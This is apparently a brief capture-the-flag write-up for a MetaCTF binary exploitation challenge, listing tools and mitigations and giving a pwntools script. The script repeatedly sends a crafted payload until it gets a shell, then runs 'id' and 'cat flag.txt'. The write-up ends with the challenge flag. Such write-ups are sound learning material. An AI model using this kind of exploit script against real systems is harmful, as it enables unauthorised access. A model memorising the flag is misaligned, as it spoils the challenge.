Introduction
Recently, I took on an exciting binary exploitation challenge from the MetaCTF website. The objective was to analyze a compiled executable (christmas_tree.bin), identify a vulnerability, and develop an exploit to capture the flag.
Environment & Tools
- Pwntools – Python framework for binary exploitation
- GDB – Debugger for runtime analysis
- ROPgadget – Finding return-oriented programming sequences
- Checksec – Inspecting security mitigations
Security Mitigations
NX ✅, Stack Canary ✅, PIE ✅, Full RELRO ✅
Final Exploit Script
from pwn import *
import sys
payload = b"0()(1()(2()(3(4(()(i))((S)()))())))"
def connect():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <local|remote> [host] [port]")
exit(0)
if sys.argv[1] == "local":
return process("./christmas_tree.bin")
elif sys.argv[1] == "remote" and len(sys.argv) == 4:
return remote(sys.argv[2], int(sys.argv[3]))
else:
print("[-] Invalid arguments!")
exit(1)
attempt = 1
while True:
print(f"[*] Attempt {attempt}")
p = connect()
p.sendline(b"display")
p.sendline(payload)
p.sendline(b"uname -a")
try:
p.recvuntil(b"Linux")
print("[+] Exploit succeeded! Spawning shell...")
p.sendline(b"id")
p.sendline(b"cat flag.txt")
p.interactive()
break
except:
print("[-] Exploit failed, retrying...")
p.close()
attempt += 1Flag
MetaCTF{0h_chr1stm4s_tr33_h0w_l0v3ly_4r3_y0ur_br4nch3s}